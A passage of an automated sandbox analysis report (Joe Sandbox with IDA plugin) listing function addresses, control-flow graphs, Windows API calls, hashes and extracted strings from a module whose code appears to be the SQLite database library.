                                                                                                                                                                                                                  control_flow_graph 1317 7ffd943b4d70-7ffd943b4d99 call 7ffd944f28d0 1320 7ffd943b4da5-7ffd943b4dbd GetFileAttributesW 1317->1320 1321 7ffd943b4d9b-7ffd943b4da0 1317->1321 1323 7ffd943b4e50-7ffd943b4e65 1320->1323 1324 7ffd943b4dc3-7ffd943b4dcd 1320->1324 1322 7ffd943b4ed1-7ffd943b4ee5 1321->1322 1327 7ffd943b4e67-7ffd943b4e87 call 7ffd944f1a30 1323->1327 1329 7ffd943b4e8d 1323->1329 1325 7ffd943b4dd0-7ffd943b4dd2 1324->1325 1325->1327 1328 7ffd943b4dd8-7ffd943b4dea DeleteFileW 1325->1328 1335 7ffd943b4ec2-7ffd943b4ecf call 7ffd943c4c20 1327->1335 1331 7ffd943b4df0-7ffd943b4e03 1328->1331 1332 7ffd943b4e92-7ffd943b4e94 1328->1332 1329->1332 1340 7ffd943b4e89-7ffd943b4e8b 1331->1340 1341 7ffd943b4e09-7ffd943b4e0f 1331->1341 1334 7ffd943b4e96-7ffd943b4ebd call 7ffd943d8730 1332->1334 1332->1335 1334->1335 1335->1322 1340->1327 1342 7ffd943b4e17-7ffd943b4e1a 1341->1342 1343 7ffd943b4e11-7ffd943b4e15 1341->1343 1344 7ffd943b4e23-7ffd943b4e4e 1342->1344 1345 7ffd943b4e1c-7ffd943b4e21 1342->1345 1343->1342 1343->1344 1344->1323 1344->1325 1345->1340 1345->1344
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: File$AttributesDelete
                                                                                                                                                                                                                  • String ID: delayed %dms for lock/sharing conflict at line %d$winDelete
                                                                                                                                                                                                                  • API String ID: 2910425767-1405699761
                                                                                                                                                                                                                  • Opcode ID: 13edbdd10a57c23098de7f166d5803e5bdf18e655187fc172d3a7fd25b5c1cf9
                                                                                                                                                                                                                  • Instruction ID: eabe1fa6052022d3ad3199141bd6b1f39a60f97c4d8e951e5b4ed951ae893f26
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 13edbdd10a57c23098de7f166d5803e5bdf18e655187fc172d3a7fd25b5c1cf9
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 54419F20B0860282F675ABE5A9E01786361AF57B90F50C639DA5D477A3CF3CE845C204
                                                                                                                                                                                                                  Function 00007FFD943B36F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116fileCOMMON
                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                  control_flow_graph 1459 7ffd943b36f0-7ffd943b371b 1460 7ffd943b376b-7ffd943b3798 1459->1460 1461 7ffd943b371d-7ffd943b3732 1459->1461 1464 7ffd943b37a0-7ffd943b37cb ReadFile 1460->1464 1462 7ffd943b3754-7ffd943b3768 call 7ffd944fcf10 1461->1462 1463 7ffd943b3734 call 7ffd944fcf10 1461->1463 1462->1460 1469 7ffd943b3739 1463->1469 1467 7ffd943b3858-7ffd943b385a 1464->1467 1468 7ffd943b37d1-7ffd943b37e1 1464->1468 1471 7ffd943b3888-7ffd943b3891 1467->1471 1472 7ffd943b385c-7ffd943b3883 call 7ffd943d8730 1467->1472 1468->1467 1477 7ffd943b37e3-7ffd943b37f6 1468->1477 1474 7ffd943b373b-7ffd943b3753 1469->1474 1471->1469 1473 7ffd943b3897-7ffd943b38ac call 7ffd944fd5c0 1471->1473 1472->1471 1473->1474 1481 7ffd943b37f8-7ffd943b37fe 1477->1481 1482 7ffd943b3830-7ffd943b3853 call 7ffd944f1a30 1477->1482 1483 7ffd943b3806-7ffd943b3809 1481->1483 1484 7ffd943b3800-7ffd943b3804 1481->1484 1482->1474 1486 7ffd943b3812-7ffd943b382b 1483->1486 1487 7ffd943b380b-7ffd943b3810 1483->1487 1484->1483 1484->1486 1486->1464 1487->1482 1487->1486
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: FileRead
                                                                                                                                                                                                                  • String ID: delayed %dms for lock/sharing conflict at line %d$winRead
                                                                                                                                                                                                                  • API String ID: 2738559852-1843600136
                                                                                                                                                                                                                  • Opcode ID: f8d04d545caad1c6a2317e95ff4ca039504f2048aa6dee570b7be787d13645d2
                                                                                                                                                                                                                  • Instruction ID: f1834c4ee8638bb3a9877298bbbae3b1d54a633d952237e3c85c934fff49c0b2
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f8d04d545caad1c6a2317e95ff4ca039504f2048aa6dee570b7be787d13645d2
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5541F132B18A5282E6749FA5E4E06B9B761FB46B80F41813ADA4D87656CF3CE44AC340
                                                                                                                                                                                                                  Function 00007FFD944E9C70 Relevance: 3.3, APIs: 2, Instructions: 327COMMONLIBRARYCODE
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                  • Opcode ID: 01bfdea8fde9a3b29e8790184ed6a843e84f17ebbdda68c3349c733af6744fc2
                                                                                                                                                                                                                  • Instruction ID: 25887c07a2a3a66cf23af6dd40d244c5761912328888d3613ad3fec3d8802973
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 01bfdea8fde9a3b29e8790184ed6a843e84f17ebbdda68c3349c733af6744fc2
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C9D17222B0864686EB749FA5D4E067F33A1EB46B84F049135DA4E877DAEF7DE844C700
                                                                                                                                                                                                                  Function 00007FFD9450996C Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • RtlFreeHeap.NTDLL(?,?,?,00007FFD945122A2,?,?,?,00007FFD945122DF,?,?,00000000,00007FFD9450FE4D,?,?,?,00007FFD9450FD7F), ref: 00007FFD94509982
                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FFD945122A2,?,?,?,00007FFD945122DF,?,?,00000000,00007FFD9450FE4D,?,?,?,00007FFD9450FD7F), ref: 00007FFD9450998C
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 485612231-0
                                                                                                                                                                                                                  • Opcode ID: 1e5e7c948760cf301929a07a706e348abcbcec31b0f3dce1069e93b05921774f
                                                                                                                                                                                                                  • Instruction ID: 3bce5420cc4a31646699f057660d374772f1c6b681392140fb89b66625abdaa4
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1e5e7c948760cf301929a07a706e348abcbcec31b0f3dce1069e93b05921774f
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 04E08C95F0920242FFBAABF2A8F617913609F9BB00F04C834C91D4225FEE2CAC81C251

                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                  Function 00007FFD94474770 Relevance: 30.0, Strings: 23, Instructions: 1217COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: UNIQUE$BINARY$CREATE%s INDEX %.*s$FIRST$INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);$LAST$cannot create a TEMP index on non-TEMP table "%s"$conflicting ON CONFLICT clauses specified$expressions prohibited in PRIMARY KEY and UNIQUE constraints$index$index %s already exists$invalid rootpage$name='%q' AND type='index'$sqlite_$sqlite_autoindex_%s_%d$sqlite_master$sqlite_temp_master$table %s may not be indexed$there is already a table named %s$too many columns in %s$unsupported use of NULLS %s$views may not be indexed$virtual tables may not be indexed
                                                                                                                                                                                                                  • API String ID: 0-2483461966
                                                                                                                                                                                                                  • Opcode ID: a8a71a941c890f90e2ae85053de89cb1297b1c782d384ea9fdf8966f3a450f00
                                                                                                                                                                                                                  • Instruction ID: 9e5d1712b27e30d6bffc04ae89ac79319e676e1e8b11a0617b37cd941a2ac66e
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a8a71a941c890f90e2ae85053de89cb1297b1c782d384ea9fdf8966f3a450f00
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 94C2F332B09B8186EB748BA5D4A46BD37A1FB46B84F45C135DA4D4BB9ADF7CE442C300
                                                                                                                                                                                                                  Function 00007FFD9448D190 Relevance: 23.2, Strings: 18, Instructions: 664COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: %Q.'%q_%s'$, NULL$, T.%Q$, T.c%d$, T.l%d$T.%Q$content$contentless_delete=1 is incompatible with columnsize=0$contentless_delete=1 requires a contentless table$contentless_unindexed=1 requires a contentless table$docsize$parse error in "%s"$rank$reserved fts5 column name: %s$reserved fts5 table name: %s$rowid$unindexed$unrecognized column option: %s
                                                                                                                                                                                                                  • API String ID: 0-1703952466
                                                                                                                                                                                                                  • Opcode ID: 431fa28e951a4f5cbf4f910afd8cf6effa8b07ac8b5ccaaad21844ba22fab33a
                                                                                                                                                                                                                  • Instruction ID: b1bd7f277617e8f678c95166e1951473ba8dc0c6f120e18b7e26f020341af8c1
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 431fa28e951a4f5cbf4f910afd8cf6effa8b07ac8b5ccaaad21844ba22fab33a
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7652B361B1A65686FBB59FE198E06BD27A0BF06B84F448135DE1E5379ADFBCE401C300
                                                                                                                                                                                                                  Function 00007FFD94466210 Relevance: 20.5, Strings: 16, Instructions: 519COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: C$C$C$C$always$aolf$bolb$bolc$buod$duplicate column name: %s$generated$laer$rahc$tni$too many columns on %s$txet
                                                                                                                                                                                                                  • API String ID: 0-3729332310
                                                                                                                                                                                                                  • Opcode ID: 5e83c52123167284dc2753d45648d3934dce6701ed0bbb556427ce4c73822bfd
                                                                                                                                                                                                                  • Instruction ID: 172cae4e184739f170f09893d0eb4e958b1ddfd35ee2ae9cb0d52ff94df10f8b
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e83c52123167284dc2753d45648d3934dce6701ed0bbb556427ce4c73822bfd
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE223962B0C6D641EB758BA594F07B96BA1EB43768F54C036DE9E4B2CBCE6CE541C300
                                                                                                                                                                                                                  Function 00007FFD944783E0 Relevance: 19.4, Strings: 15, Instructions: 645COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: AUTOINCREMENT not allowed on WITHOUT ROWID tables$CREATE %s %.*s$CREATE TABLE %Q.sqlite_sequence(name,seq)$PRIMARY KEY missing on table %s$SELECT*FROM"%w"."%w"$TABLE$UPDATE %Q.sqlite_master SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d$VIEW$missing datatype for %s.%s$must have at least one non-generated column$sqlite_sequence$table$tbl_name='%q' AND type!='trigger'$unknown datatype for %s.%s: "%s"$view
                                                                                                                                                                                                                  • API String ID: 0-1715202245
                                                                                                                                                                                                                  • Opcode ID: 26bff9bdfba57077f07abedee38eefb226d3c730016b800d8c5383d45b3d791b
                                                                                                                                                                                                                  • Instruction ID: 1f27aab8b6ced2fbb8956eb3b4b96446ab36a4528d31479bf86bac7ec4e44846
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 26bff9bdfba57077f07abedee38eefb226d3c730016b800d8c5383d45b3d791b
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F7629172B0968686EB709FA5D0A07B977A0FB46B88F04C135CA4D4779ADFBCE446C701
                                                                                                                                                                                                                  Function 00007FFD944A57F0 Relevance: 16.8, Strings: 13, Instructions: 503COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: %s mode not allowed: %s$/$/$access$cach$cach$cache$file$invalid uri authority: %.*s$localhos$mode$no such %s mode: %s$no such vfs: %s
                                                                                                                                                                                                                  • API String ID: 0-3326250075
                                                                                                                                                                                                                  • Opcode ID: 5ac9bf2c28dfc651393f0f07f907cb26354b9bb91fe21debf58741ccb5cdd3ce
                                                                                                                                                                                                                  • Instruction ID: 8c959fae0461547e399b33585fc86469c44fbc9a97e4f6c2eb9b7b95fe2cf8bd
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5ac9bf2c28dfc651393f0f07f907cb26354b9bb91fe21debf58741ccb5cdd3ce
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B822F372B0E68245FB798BD096E03796791AF13BA4F04C235CA5E466DBDEBCE445C300
                                                                                                                                                                                                                  Function 00007FFD944246C0 Relevance: 16.0, Strings: 12, Instructions: 1030COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: ascii$bm25$fts5$fts5_get_locale$fts5_locale$fts5_source_id$highlight$porter$snippet$trigram$unable to delete/modify user-function due to active statements$unicode61
                                                                                                                                                                                                                  • API String ID: 0-4043592257
                                                                                                                                                                                                                  • Opcode ID: 44aaf174e22da7886593eb513ff4e7a20e04b982f78ec735784f0073a20c24f4
                                                                                                                                                                                                                  • Instruction ID: 28481aeb9ef16f45c155b54ef60f5025d94822fc7fd6f56cf4fb4e96c719f185
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 44aaf174e22da7886593eb513ff4e7a20e04b982f78ec735784f0073a20c24f4
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 08A2AD62B09B4286EB798FE1D5A02B967A1FB46B84F44C136CA4D0739ADFBCE455C340
                                                                                                                                                                                                                  Function 00007FFD943E5450 Relevance: 15.5, Strings: 12, Instructions: 521COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: Child page depth differs$Extends off end of page$Fragmentation of %u bytes reported as %u on page %u$Multiple uses for byte %u of page %u$Offset %u out of range %u..%u$Rowid %lld out of order$Tree %u page %u cell %u: $Tree %u page %u right child: $Tree %u page %u: $btreeInitPage() returns error code %d$free space corruption$unable to get the page. error code=%d
                                                                                                                                                                                                                  • API String ID: 0-835090162
                                                                                                                                                                                                                  • Opcode ID: 47aba286c961b50c6ca94960fe02a80b70722f0238a3a6d117d119632bfe6d1d
                                                                                                                                                                                                                  • Instruction ID: 41003d916e5b94f1637f4a34949fa2aabe6767951b284b273cc3bf1170b5b4ae
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 47aba286c961b50c6ca94960fe02a80b70722f0238a3a6d117d119632bfe6d1d
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BC32B036B1969187D7789FA5E0A067F7BA1F786B84F008129DB8A43B56DF3DE441CB00
                                                                                                                                                                                                                  Function 00007FFD943C03D0 Relevance: 13.9, Strings: 11, Instructions: 155COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
